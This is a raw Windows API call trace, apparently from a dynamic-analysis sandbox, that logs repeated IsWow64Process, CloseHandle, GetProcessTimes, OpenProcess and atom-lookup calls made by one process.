	[0141.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.512] CloseHandle (hObject=0x2dc) returned 1
	[0141.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.512] CloseHandle (hObject=0x2dc) returned 1
	[0141.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.513] CloseHandle (hObject=0x2dc) returned 1
	[0141.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.513] CloseHandle (hObject=0x2dc) returned 1
	[0141.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.513] CloseHandle (hObject=0x2dc) returned 1
	[0141.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.513] CloseHandle (hObject=0x2dc) returned 1
	[0141.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.514] CloseHandle (hObject=0x2dc) returned 1
	[0141.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.514] CloseHandle (hObject=0x2dc) returned 1
	[0141.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.514] CloseHandle (hObject=0x2dc) returned 1
	[0141.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.515] CloseHandle (hObject=0x2dc) returned 1
	[0141.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.515] CloseHandle (hObject=0x2dc) returned 1
	[0141.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.515] CloseHandle (hObject=0x2dc) returned 1
	[0141.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.515] CloseHandle (hObject=0x2dc) returned 1
	[0141.516] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.516] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.516] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.516] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.517] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.517] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.517] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.517] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.517] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.517] CloseHandle (hObject=0x2dc) returned 1
	[0141.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.518] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.518] CloseHandle (hObject=0x2dc) returned 1
	[0141.518] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.518] CloseHandle (hObject=0x2dc) returned 1
	[0141.518] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.518] CloseHandle (hObject=0x2dc) returned 1
	[0141.518] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.518] CloseHandle (hObject=0x2dc) returned 1
	[0141.519] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.519] CloseHandle (hObject=0x2dc) returned 1
	[0141.551] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.551] CloseHandle (hObject=0x2dc) returned 1
	[0141.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.552] CloseHandle (hObject=0x2dc) returned 1
	[0141.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.552] CloseHandle (hObject=0x2dc) returned 1
	[0141.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.552] CloseHandle (hObject=0x2dc) returned 1
	[0141.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.552] CloseHandle (hObject=0x2dc) returned 1
	[0141.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.553] CloseHandle (hObject=0x2dc) returned 1
	[0141.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.553] CloseHandle (hObject=0x2dc) returned 1
	[0141.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.553] CloseHandle (hObject=0x2dc) returned 1
	[0141.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.553] CloseHandle (hObject=0x2dc) returned 1
	[0141.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.554] CloseHandle (hObject=0x2dc) returned 1
	[0141.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.554] CloseHandle (hObject=0x2dc) returned 1
	[0141.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.554] CloseHandle (hObject=0x2dc) returned 1
	[0141.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.555] CloseHandle (hObject=0x2dc) returned 1
	[0141.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.555] CloseHandle (hObject=0x2dc) returned 1
	[0141.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.555] CloseHandle (hObject=0x2dc) returned 1
	[0141.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.556] CloseHandle (hObject=0x2dc) returned 1
	[0141.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.556] CloseHandle (hObject=0x2dc) returned 1
	[0141.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.556] CloseHandle (hObject=0x2dc) returned 1
	[0141.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.556] CloseHandle (hObject=0x2dc) returned 1
	[0141.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.557] CloseHandle (hObject=0x2dc) returned 1
	[0141.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.557] CloseHandle (hObject=0x2dc) returned 1
	[0141.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.557] CloseHandle (hObject=0x2dc) returned 1
	[0141.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.557] CloseHandle (hObject=0x2dc) returned 1
	[0141.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.558] CloseHandle (hObject=0x2dc) returned 1
	[0141.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.558] CloseHandle (hObject=0x2dc) returned 1
	[0141.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.558] CloseHandle (hObject=0x2dc) returned 1
	[0141.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.559] CloseHandle (hObject=0x2dc) returned 1
	[0141.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.559] CloseHandle (hObject=0x2dc) returned 1
	[0141.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.559] CloseHandle (hObject=0x2dc) returned 1
	[0141.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.559] CloseHandle (hObject=0x2dc) returned 1
	[0141.560] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.560] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.560] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.560] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.561] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.561] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.561] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.561] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.561] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.561] CloseHandle (hObject=0x2dc) returned 1
	[0141.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.562] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.562] CloseHandle (hObject=0x2dc) returned 1
	[0141.562] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.562] CloseHandle (hObject=0x2dc) returned 1
	[0141.562] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.562] CloseHandle (hObject=0x2dc) returned 1
	[0141.562] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.562] CloseHandle (hObject=0x2dc) returned 1
	[0141.563] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.563] CloseHandle (hObject=0x2dc) returned 1
	[0141.596] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.596] CloseHandle (hObject=0x2dc) returned 1
	[0141.596] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.596] CloseHandle (hObject=0x2dc) returned 1
	[0141.597] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.597] CloseHandle (hObject=0x2dc) returned 1
	[0141.597] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.597] CloseHandle (hObject=0x2dc) returned 1
	[0141.597] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.597] CloseHandle (hObject=0x2dc) returned 1
	[0141.598] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.598] CloseHandle (hObject=0x2dc) returned 1
	[0141.598] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.598] CloseHandle (hObject=0x2dc) returned 1
	[0141.598] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.598] CloseHandle (hObject=0x2dc) returned 1
	[0141.598] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.599] CloseHandle (hObject=0x2dc) returned 1
	[0141.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.599] CloseHandle (hObject=0x2dc) returned 1
	[0141.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.599] CloseHandle (hObject=0x2dc) returned 1
	[0141.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.599] CloseHandle (hObject=0x2dc) returned 1
	[0141.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.600] CloseHandle (hObject=0x2dc) returned 1
	[0141.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.600] CloseHandle (hObject=0x2dc) returned 1
	[0141.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.600] CloseHandle (hObject=0x2dc) returned 1
	[0141.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.600] CloseHandle (hObject=0x2dc) returned 1
	[0141.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.601] CloseHandle (hObject=0x2dc) returned 1
	[0141.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.601] CloseHandle (hObject=0x2dc) returned 1
	[0141.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.601] CloseHandle (hObject=0x2dc) returned 1
	[0141.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.601] CloseHandle (hObject=0x2dc) returned 1
	[0141.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.602] CloseHandle (hObject=0x2dc) returned 1
	[0141.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.602] CloseHandle (hObject=0x2dc) returned 1
	[0141.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.602] CloseHandle (hObject=0x2dc) returned 1
	[0141.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.602] CloseHandle (hObject=0x2dc) returned 1
	[0141.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.603] CloseHandle (hObject=0x2dc) returned 1
	[0141.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.603] CloseHandle (hObject=0x2dc) returned 1
	[0141.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.603] CloseHandle (hObject=0x2dc) returned 1
	[0141.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.603] CloseHandle (hObject=0x2dc) returned 1
	[0141.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.604] CloseHandle (hObject=0x2dc) returned 1
	[0141.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.604] CloseHandle (hObject=0x2dc) returned 1
	[0141.604] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.605] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.605] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.605] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.605] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.605] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.606] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.606] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.606] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.606] CloseHandle (hObject=0x2dc) returned 1
	[0141.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.606] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.606] CloseHandle (hObject=0x2dc) returned 1
	[0141.606] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.606] CloseHandle (hObject=0x2dc) returned 1
	[0141.607] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.607] CloseHandle (hObject=0x2dc) returned 1
	[0141.607] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.607] CloseHandle (hObject=0x2dc) returned 1
	[0141.607] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.607] CloseHandle (hObject=0x2dc) returned 1
	[0141.642] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.642] CloseHandle (hObject=0x2dc) returned 1
	[0141.642] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.642] CloseHandle (hObject=0x2dc) returned 1
	[0141.642] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.642] CloseHandle (hObject=0x2dc) returned 1
	[0141.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.643] CloseHandle (hObject=0x2dc) returned 1
	[0141.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.643] CloseHandle (hObject=0x2dc) returned 1
	[0141.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.643] CloseHandle (hObject=0x2dc) returned 1
	[0141.643] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.643] CloseHandle (hObject=0x2dc) returned 1
	[0141.644] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.644] CloseHandle (hObject=0x2dc) returned 1
	[0141.644] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.644] CloseHandle (hObject=0x2dc) returned 1
	[0141.644] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.644] CloseHandle (hObject=0x2dc) returned 1
	[0141.644] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.644] CloseHandle (hObject=0x2dc) returned 1
	[0141.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.645] CloseHandle (hObject=0x2dc) returned 1
	[0141.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.645] CloseHandle (hObject=0x2dc) returned 1
	[0141.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.645] CloseHandle (hObject=0x2dc) returned 1
	[0141.645] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.645] CloseHandle (hObject=0x2dc) returned 1
	[0141.646] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.646] CloseHandle (hObject=0x2dc) returned 1
	[0141.646] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.646] CloseHandle (hObject=0x2dc) returned 1
	[0141.646] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.646] CloseHandle (hObject=0x2dc) returned 1
	[0141.646] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.646] CloseHandle (hObject=0x2dc) returned 1
	[0141.647] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.647] CloseHandle (hObject=0x2dc) returned 1
	[0141.647] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.647] CloseHandle (hObject=0x2dc) returned 1
	[0141.647] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.647] CloseHandle (hObject=0x2dc) returned 1
	[0141.647] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.647] CloseHandle (hObject=0x2dc) returned 1
	[0141.648] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.648] CloseHandle (hObject=0x2dc) returned 1
	[0141.648] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.648] CloseHandle (hObject=0x2dc) returned 1
	[0141.648] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.648] CloseHandle (hObject=0x2dc) returned 1
	[0141.649] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.649] CloseHandle (hObject=0x2dc) returned 1
	[0141.649] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.649] CloseHandle (hObject=0x2dc) returned 1
	[0141.649] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.649] CloseHandle (hObject=0x2dc) returned 1
	[0141.649] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.649] CloseHandle (hObject=0x2dc) returned 1
	[0141.650] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.650] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.650] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.650] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.651] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.651] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.651] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.651] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.651] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.651] CloseHandle (hObject=0x2dc) returned 1
	[0141.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.651] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.652] CloseHandle (hObject=0x2dc) returned 1
	[0141.652] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.652] CloseHandle (hObject=0x2dc) returned 1
	[0141.652] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.652] CloseHandle (hObject=0x2dc) returned 1
	[0141.652] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.652] CloseHandle (hObject=0x2dc) returned 1
	[0141.652] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.653] CloseHandle (hObject=0x2dc) returned 1
	[0141.686] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.687] CloseHandle (hObject=0x2dc) returned 1
	[0141.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.687] CloseHandle (hObject=0x2dc) returned 1
	[0141.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.687] CloseHandle (hObject=0x2dc) returned 1
	[0141.687] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.687] CloseHandle (hObject=0x2dc) returned 1
	[0141.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.688] CloseHandle (hObject=0x2dc) returned 1
	[0141.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.688] CloseHandle (hObject=0x2dc) returned 1
	[0141.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.688] CloseHandle (hObject=0x2dc) returned 1
	[0141.688] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.688] CloseHandle (hObject=0x2dc) returned 1
	[0141.689] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.689] CloseHandle (hObject=0x2dc) returned 1
	[0141.689] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.689] CloseHandle (hObject=0x2dc) returned 1
	[0141.689] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.689] CloseHandle (hObject=0x2dc) returned 1
	[0141.690] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.690] CloseHandle (hObject=0x2dc) returned 1
